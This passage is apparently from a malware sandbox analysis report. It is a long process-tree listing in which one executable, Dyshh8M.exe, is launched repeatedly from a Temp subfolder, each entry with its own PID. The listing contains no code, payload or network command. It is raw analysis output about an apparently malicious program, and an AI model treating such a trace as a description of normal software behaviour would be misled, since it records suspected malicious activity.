        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9136
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9144
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9152
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9160
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9168
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9176
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9184
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9192
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9200
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9208
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2764
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6992
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9220
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9228
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9236
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9244
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9252
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9260
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9268
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9276
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9284
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9292
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9300
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9308
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9316
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9324
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9332
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9340
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9348
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9356
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9364
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9372
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9380
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9388
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9396
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9404
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9412
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9420
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9428
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9436
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9444
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9452
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9460
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9468
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9476
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9484
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9492
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9500
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9508
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9516
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9524
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9532
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9540
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9548
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9556
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9564
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9572
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9580
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9588
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9596
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9604
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9612
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9620
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9628
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9636
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9644
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9652
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9660
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9668
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9676
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9684
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9692
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9700
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9708
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9716
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9724
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9732
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9740
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9748
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9756
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9764
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9772
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9780
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9788
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9796
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9804
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9812
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9820
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9828
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9836
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9844
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9852
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9860
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9868
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9876
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9884
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9892
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9900
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9908
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9916
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9924
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9932
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9940
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9948
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9956
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9964
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9972
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9980
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9988
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9996
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10004
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10012
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10020
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10028
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10036
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10044
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10052
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10060
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10068
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10076
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10084
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10092
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10100
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10108
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10116
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10124
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10132
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10140
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10148
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10156
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10164
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10172
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10180
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10188
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10196
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10204
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10212
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10220
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10228
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10236
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5428
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:3340
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10248
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10256
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10264
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10272
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10280
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10288
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10296
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10304
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10312
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10320
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10328
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10336
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10344
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10352
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
